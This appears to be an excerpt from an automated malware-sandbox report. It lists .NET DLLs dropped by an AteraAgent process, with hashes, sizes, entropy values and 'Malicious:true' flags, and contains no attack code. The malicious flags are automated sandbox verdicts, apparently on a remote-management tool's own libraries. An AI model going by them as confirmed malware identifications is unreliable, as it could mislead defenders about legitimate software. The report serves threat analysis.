                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):26704
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.570026795492357
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Y+J1o5egFMvqo5e1l6vWkf2WoNyb8E9VF6IYijSJIVxL96Pj:71WFMbhN4EpYi60BK
                                                                                                                                                                                                                                                                                              MD5:222B5E6512C1D65F59F7C5AA75D68DD2
                                                                                                                                                                                                                                                                                              SHA1:29E9A28EBDF6166475A9D3706EAA500CAA5E2D79
                                                                                                                                                                                                                                                                                              SHA-256:3F422633EAE1FD9DF134BE1694C6C4A3C3019CF240DB6B4B9DBD2FEA8160F253
                                                                                                                                                                                                                                                                                              SHA-512:FE096820E431DCB2538A326C72BB598BAF8313890267AE2DA92076C32C0D4FC6B38BB460C9E38F2127A0CF7BB6461D875ED2B02962AFCBE1D181B848B80BF9E1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25168
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.571329249700056
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:l/sfDn/DN9gRxL1iF8gSE1LGDW9PCWeNyb8E9VF6IYijSJIVx1+myPB4:obNmxcRGe6EpYi604B4
                                                                                                                                                                                                                                                                                              MD5:3BC988F43478A5E1A6719F9EB2CCCA71
                                                                                                                                                                                                                                                                                              SHA1:8720F54A4A075DD67664F4D89F8612EB809394E8
                                                                                                                                                                                                                                                                                              SHA-256:7F193464B4698D8077025C4089FC718530FE616375A97F7D6ED073694A9C53A5
                                                                                                                                                                                                                                                                                              SHA-512:DE6193AC74DD023B43EDF22586C55240D5FCAD420FEF1E829951DD5CBEAEEFF16FF68680A5F04B6D36AF6A607A10E1B52DE0976C9DBB46851340DE499D716809
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):43600
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.399923725131256
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:9LJOZTEW1WTsTeVnrI/yqCtHUafO+ukucyLEpYi60IMMa:9LJOpEQzTp/AX2+uMyk76/MMa
                                                                                                                                                                                                                                                                                              MD5:E8CD1E0A6A89129AD776C7D7BFEF4907
                                                                                                                                                                                                                                                                                              SHA1:7E6F3672648C4E56402BACBD9BDACAFE9A31424F
                                                                                                                                                                                                                                                                                              SHA-256:305218D92D5D9B1786BCA766E431F29725F260BEED61823E643F875E4676B03E
                                                                                                                                                                                                                                                                                              SHA-512:7B641F2022286EA87090F0FDC5A4A1C82F6A48CF9CF32F1FFE23B04EDD6E556BEE86EF49B7130CDEFE461E2D49ADA2A1DEB85BA3990CC17BF99A95EE87EFB9B0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64080
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.151192295647228
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:3CYbKF0XEQqb7Uo5hGrrd0i0A7Hf6dbW9yI76T:xXp0pk/6dK9yIc
                                                                                                                                                                                                                                                                                              MD5:6DE9D1736C081359EB51A1B41ADB196C
                                                                                                                                                                                                                                                                                              SHA1:0E884000FDB1C0964AE2F4F5A24B430DC0C181AA
                                                                                                                                                                                                                                                                                              SHA-256:75F9AA6E3B3733CD6857C479310BA211A01160A60D366435DA2604E7046D3EBF
                                                                                                                                                                                                                                                                                              SHA-512:2B9265C448B21699A512539902A39BC8106EC044C75608C8CA0CC33C5E0FE0F374B41D2B7C74CC3F78DB68594B81D93011C903EA76A83B9DD585CFBBF4C6BC85
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):92240
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.260824569233109
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:wsS1Tz5tF1bQWVsdJCKTvZEmwbyQMB76V203:5QH5tsWUvZEmNQMBDc
                                                                                                                                                                                                                                                                                              MD5:9BD1B5B151EE828D50BA1F0AF141923C
                                                                                                                                                                                                                                                                                              SHA1:C4666D2D6A74131C458E6987B83AE1F4188C2BC0
                                                                                                                                                                                                                                                                                              SHA-256:A2F6E1CD60C1194F1AA9798A2209CDA5079F3D3F6BA4B699E079FC856B7D7BFC
                                                                                                                                                                                                                                                                                              SHA-512:21C332A21BDC72DAFB71C6DF0E80F23A78B20F6D6C452EDEE02ABA6A1D46C3167D489202218E73C0C60E2B2C6586A9EC20824B2A951D4E916924A520E9E47463
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):30288
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.433740703561921
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:WVZvGPhQTlrYouV5vE+YlOjqmfQ4vWOfRW9Nyb8E9VF6IYijSJIVx12+FOum73:c+5QqnV1Zb/2EpYi603i3
                                                                                                                                                                                                                                                                                              MD5:1B3CD16BA16B8ADF734A81FF688246C6
                                                                                                                                                                                                                                                                                              SHA1:E0F04DA639F8DBC83E1F818BE3512B8B32825181
                                                                                                                                                                                                                                                                                              SHA-256:32083D1E8B347DADA45BF2E986CD8873A55926863ABFA78AB286BB57F418136B
                                                                                                                                                                                                                                                                                              SHA-512:116B960C4CA7A1D596004036EC60837D3C74687CCF3D13772DEB9C0A3F48A91A66196372BE013B66EECBDA32C852FA1D5E7183BB2C34DB48BCE764D40A6D2BE9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):35408
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.489255735196851
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:1CuDYWVpNJY2b12pRMoYDQFRK8EDdFUg4ThTqbO4UyBoPHQss9gCWP/kW2Nyb8Ec:1CuMWVBZb1alK3/uT6BmagzoEpYi60M
                                                                                                                                                                                                                                                                                              MD5:FBDF079FDFE1D5AB83A77C605675ABC4
                                                                                                                                                                                                                                                                                              SHA1:F6B7C33CF4B312F2F6EFD187B3647490672BE541
                                                                                                                                                                                                                                                                                              SHA-256:9FD96218556419229560DCB960FF0D6E771D2144C1F7F047301ABDF534F1EBEE
                                                                                                                                                                                                                                                                                              SHA-512:AE1FFE60E877B52FBF204876F60310F2E465DED57254A7EB37B4CBE1B8EEE52A493B20D1D9012EBB8CB73A086583765AA1098CCB08610B917907D4B8073F919C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22096
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.6166303658453405
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:LgH8Tv2So+MVV1CMHWs/hW2Nyb8E9VF6IYijSJIVx2iBvJ:LgcTvlGFtVEpYi60RJ
                                                                                                                                                                                                                                                                                              MD5:00671AFD77C0B92B94EBF7ED1FE1733F
                                                                                                                                                                                                                                                                                              SHA1:3B9B94063A438C5B8B867A4C5EDB15213C944050
                                                                                                                                                                                                                                                                                              SHA-256:78B082BA22BBD5D9DE7360AC96B8792E91EA1698520DEF5AC50598E5A4B203A5
                                                                                                                                                                                                                                                                                              SHA-512:CE458E3B9A92EB8F28B922370124F92F2498F486C59969B26A96C665B9ED92F6A26412BA499B3BE5534CD0AC06D710BDB79A3FF26801F4D269E1124847E5981A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44624
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.4383472343149935
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:d0uMdRozKWWyAWxcnuHeHopdtU6LCxZF+4EpYi6034x:dPMSeWWyZcnuHeIpdtUxZF+B76J
                                                                                                                                                                                                                                                                                              MD5:ADAAB325F94C1A45753773E670DB286B
                                                                                                                                                                                                                                                                                              SHA1:BD771EF76221B98CBB0DD9EC5DE8603A4743E85F
                                                                                                                                                                                                                                                                                              SHA-256:7815D5505EB66DD0058F36D52CCA09E38607D88E75EB3A8382209E7822B31CB7
                                                                                                                                                                                                                                                                                              SHA-512:AD1B2A5D8A15A22FBBD97ABFA6BD41DEB41873B450EDA9FE3E639AE6DFE0FAC77214E2B5372D2F72954368528BAF732D828FD43B7B8DEB798DFF5AED8B3E0B02
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45648
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.380504630294902
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:80PO7gRE3x5o7UP04wqgYtqPRw02KO7I9Yfwbhgv5NuEpYi60KpHUdwi:802GE3xOwP04wqgYtm2nQY4Ngv5NP76W
                                                                                                                                                                                                                                                                                              MD5:F7D4ED4D032AAB5069962F97ABB53DAB
                                                                                                                                                                                                                                                                                              SHA1:5077B272686598FFA93F107B7E699163102253B6
                                                                                                                                                                                                                                                                                              SHA-256:76507D71E543E2E9548BCC8609839010180F0D747200882D17D6B3435702B099
                                                                                                                                                                                                                                                                                              SHA-512:9A32F85A780CF92EB49A180E3E9247E2D9956FCD05902F79BD4E0CDE24F9A52364801D4ACC9AEEB2EDC68433871CCA11682288E9F132F31E5C87D510DB126743
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51280
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.922122342098677
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:y1xwFY6xnU7GjPb6vXCMVOm4e+X9CzJ67Mo7tKoV2nwsyQYvZt164yCmi3FbTojS:5FJnU7GjPb6vxWFvTbTojN76zr
                                                                                                                                                                                                                                                                                              MD5:E5BF8DEF8B6FA71A58C26F97B5B8ABA6
                                                                                                                                                                                                                                                                                              SHA1:039CB79945384B4C301917DEE16488988592C035
                                                                                                                                                                                                                                                                                              SHA-256:7D34292ACC8DD95A0B1F5016A0E5C60F4975EA8E4AC85D1293D4E1225A9F5AF4
                                                                                                                                                                                                                                                                                              SHA-512:5F4978472F1AA0496C3533B52E716081AE04F01D0D4215CA29ED219C81388888C3BE79A1C28761DDC7BD714B7A03A0D3D81DC94BE3BA0723C7EA945C3E8522ED
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):72272
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.282810814332541
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:NxU6xUrlXPSW8rCe2FNUY4epmkOHjkmb8pR4x4bb4kb3Ec5qt+vEpYi60S:Nxfx+lXPSWgC19p3ibv6bbac5qt+I76T
                                                                                                                                                                                                                                                                                              MD5:F70770682F5B9B9748F0C1CA913AF810
                                                                                                                                                                                                                                                                                              SHA1:1CC25A4CC7ED6E6A392F48F3A30DF356CB1B2215
                                                                                                                                                                                                                                                                                              SHA-256:1D82B03D8251EB2EADD0B04A166388EDAFBC4B07698248E416E54487EBB6529C
                                                                                                                                                                                                                                                                                              SHA-512:F25E06F8576E714AD75A318D2626EBF66DDB09A012DE5F3D79190721C73FA155B420DAC9BED39987EA955B139D6C5C424491BAAD60AAFDE316E0BC80A7474890
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):88656
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.179212783172685
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:OOTqBUaumtB8dThJyB8Hy1Uf1p33YpyEflX6YZH265djWtI76Z:OOb9dThRH7P33YpyEfgYZH2YxCIO
                                                                                                                                                                                                                                                                                              MD5:530AEB724465732AD881A5D3C318B63C
                                                                                                                                                                                                                                                                                              SHA1:566AB48A4A2058E3E4DB1181C6E90B54985F2CCC
                                                                                                                                                                                                                                                                                              SHA-256:05BB5FD82CDBBF83F7D62D5C782284069A3ECCA1B6681337BBA3D591BE2A9429
                                                                                                                                                                                                                                                                                              SHA-512:7901A46BA21EB058EAE53B0F961B8AA1D51FDE1987907569145A60D4F4EEA9FDCD4A15AB1D1D2883E166402162BADAFA16B7655A2608477126E04BAD6376711E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):65104
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.299652052426314
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Lz7ouSrbVozuvi53ReiJd/zk6cuAJU/JJeUuvBtkJJQiH2hsm+Y+EpYi60T:cuoVozugRhTeU+AQ5+Y/76q
                                                                                                                                                                                                                                                                                              MD5:DDA21E837A8171653A9081CC35E010BB
                                                                                                                                                                                                                                                                                              SHA1:47BFE2E3A9979ABB760C1DD3E7BA7118514006FB
                                                                                                                                                                                                                                                                                              SHA-256:5CE21236DF625CC73DD1208A5839EC7CA73DFDDF62C3F2F37276A3D00D6B05E5
                                                                                                                                                                                                                                                                                              SHA-512:823F8E8A155C99AC68F501816A7BCF7080BC5DD02DAABD1E8681F811A74FA29F80A520E24EC8C22D82C677A7085659F55ED953A0D91758BD5A25F6CE64FBE127
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27728
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.560591663533643
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:vZiKrZyGBZGMjK4fCYOgmpIb6mioBkcJWxsdU7RWLNyb8E9VF6IYijSJIVxEXS47:vZiKrZ7HGMjvJbPrddU7MEpYi60W7
                                                                                                                                                                                                                                                                                              MD5:AD3C1E7A20E8219CC37595A3BA3AD8DD
                                                                                                                                                                                                                                                                                              SHA1:7099800D6B38B7BECAF4B1BF4FE6591B9217D936
                                                                                                                                                                                                                                                                                              SHA-256:687C14EB326DFD8AA51AF86DF9DD7264AC8E3153E8A9DAF991E3C5AFB299934C
                                                                                                                                                                                                                                                                                              SHA-512:EDC2BE57407C79D5EF3FE97A70A3B7EEC50E8FE195DF3CEF320098FEA831A8174FF78EC0ED219B5A302D9F90079FEBEB09317F1DED1250F5D602F8850373ABD8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):71248
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.29461718507247
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Ewj0b9108ypuuQwfi+uYTql2csO55555+VZJ4MMv0nrtrGvAo92hTHxsk5hIuT2E:Ek052O2cs14UJGyhTRthBojRVx76H
                                                                                                                                                                                                                                                                                              MD5:5EC29323EA151FCF4B8BB4E09DD19245
                                                                                                                                                                                                                                                                                              SHA1:E324CB5D1FDAD3FA17A3785CC6D6CE3CC8E941F3
                                                                                                                                                                                                                                                                                              SHA-256:299E9AB6BAA96327A7E4E3632B04D7BDF8E053A5B2D5C5575D43071831F05D55
                                                                                                                                                                                                                                                                                              SHA-512:3EE005A641098A1D00C3BDBCFE0FF81568E074F6CEAC375F50D4A5A5D49740781AC3BAD623139214FB15FC8A04247C9D7EE913AFD7BF388D7F9D2DF4A09AB61B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20048
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.686759028752427
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:HVFDkHCuH8PLmMYWJlVMWiNyb8E9VF6IYijSJIVxLA+geXEd:1NWC1Tx3sEpYi60kDo4
                                                                                                                                                                                                                                                                                              MD5:AFF9D54E76BFEF81D971C6E471A7FE17
                                                                                                                                                                                                                                                                                              SHA1:CDA61EC51B8C1358D1300F3D8E15F64D2E903432
                                                                                                                                                                                                                                                                                              SHA-256:2D2A51981EB98FF8C3DCD4DDAB66E94FA2145FBAD7767A12D56838DB86D10A3B
                                                                                                                                                                                                                                                                                              SHA-512:07C3C0AF72CE311247475F0C8CCC79C07F2847710DAC150A11AD84E4F4B775937F29D054213B6A7BFEDB25ACB2EA685363076813AA410A42EB0337EB19FA063F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25680
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.608998813453675
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:LK39j3aWjszWA3JdOBBgCV7Vwn7CW2fFWCNyb8E9VF6IYijSJIVxUSXByD:L29AWAXEB6U9EpYi60e
                                                                                                                                                                                                                                                                                              MD5:159A8C5F235B9EF411FCDA805606644F
                                                                                                                                                                                                                                                                                              SHA1:FDF4B18DE07928A58022F28A8AA6EA8643E1BE70
                                                                                                                                                                                                                                                                                              SHA-256:ABF694DF314CBD07403EBCB86BEA8EF8DF644E4BF63FA3241C12B8837DF381D7
                                                                                                                                                                                                                                                                                              SHA-512:D81DA0042293BD7B21CB8100A14B1F9EA03498F6F7F698AEB0A0A229CC0ECDB318B1C16EE83A50E37BE8E0C2000B577E9CE30C5DF0D4CD7282F62A7010C11044
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):34384
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.56721620598541
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:JupZ5W3lFhrJc6mz8O0TVHprQiWAIczKeG2OhhjXK2701rXKNpvq11W3fUWKNybr:JupZ5W1rRcoZXWNQajvpwEpYi605Dd
                                                                                                                                                                                                                                                                                              MD5:F19E5EA9BC7A58F5027CCE18D0F1019D
                                                                                                                                                                                                                                                                                              SHA1:D07F70DB1427841A36853DDD2F76285AAB64AE44
                                                                                                                                                                                                                                                                                              SHA-256:EAB1CBB04CC1099001FDD6315D4C226F4D3D4FDEDF78050C22C9AE723BCBF606
                                                                                                                                                                                                                                                                                              SHA-512:47DC4797AEBEC8D434137C0D7ED8192172AC04A139E6153090C46834A4A205C2BC80AB6EBF4C672294727F20BAD948408EB09E0BC3DC95F02B608F9E1448A81B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):50768
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.397157660922387
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:7byNvwqX2LvG84aSFWZNSYv6VmTygGPSikiw64yw64Ibdez7+Rs7XTfWDaEpYi6i:wd2C9a2+EYYbgGB4ImYYWDb766B
                                                                                                                                                                                                                                                                                              MD5:8DB37C3674788EF9C49DAC0FF3B778B2
                                                                                                                                                                                                                                                                                              SHA1:7AE7ED79C91B3024AB4F9503303AE1E39D5D3EF3
                                                                                                                                                                                                                                                                                              SHA-256:18694F875E8D75F1D409EDD7352A5B90F3AB8A4F4A9E6384BF9742E3DAB02F95
                                                                                                                                                                                                                                                                                              SHA-512:F1F43460CB9C76C53EFE03B546D88C7B3870429D70C463719873E84778940E9884C93740BA7D3FF70923EAE826C7BF28441CA58ABE3DFE3C4695E96D855BDF8E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22608
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.597507812973862
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:wqKGKA3a66KxTfdzWzP0WRNyb8E9VF6IYijSJIVx92XPx4G:HKG/L1cHEpYi60E54G
                                                                                                                                                                                                                                                                                              MD5:0AF0772BBEE511CA2E183F47EE54CF7C
                                                                                                                                                                                                                                                                                              SHA1:59776DBAF20573CF70ECE3EE76454E9F1069335D
                                                                                                                                                                                                                                                                                              SHA-256:EF306A7FA475718A2F5092AD54A1CF5187F74725DC51D17310C5022538EFF592
                                                                                                                                                                                                                                                                                              SHA-512:7716EA30C86BC3DB56021208CFDFA16C8D98637DA5919A636F18355DB0C48C34DFD8B715E13D20A52A3F3BD4097606E0BC28EA78D49F4E1D22E8D5D52B00254A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64592
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.342689807278242
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:WahqHoZX+NmzYUGrCUidKHPhwMEyBoXeg76P:WYXfFGrCLQvhwME1Xegw
                                                                                                                                                                                                                                                                                              MD5:1312309A104ED37DCC4F7DFB1FF61B5E
                                                                                                                                                                                                                                                                                              SHA1:C050AE3C858B45C9CA3BC57F2161895263CA94C7
                                                                                                                                                                                                                                                                                              SHA-256:4F64A7DB61B88C07AD49EDE87CDFDE8D07A759BA881AFB0D630BC34ECC98A78F
                                                                                                                                                                                                                                                                                              SHA-512:169CB7541E05A2CD421A2E5D901FBF9BB6A7BA1DC9F4013D4EA4F75F6DD00C2522BDE36037652016F4E80AD12C4E123E731176277CD985A6DC34010D39F923A6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):43600
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.351168895705445
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:kKEGbmbB0QERF7v6EtkKS+1ke97a1O33ttBOP7yW5yfyqTuia+15OFy0EpYi60AO:kpGe0QERFhkKSM7ag33ttBOP7yVfHTua
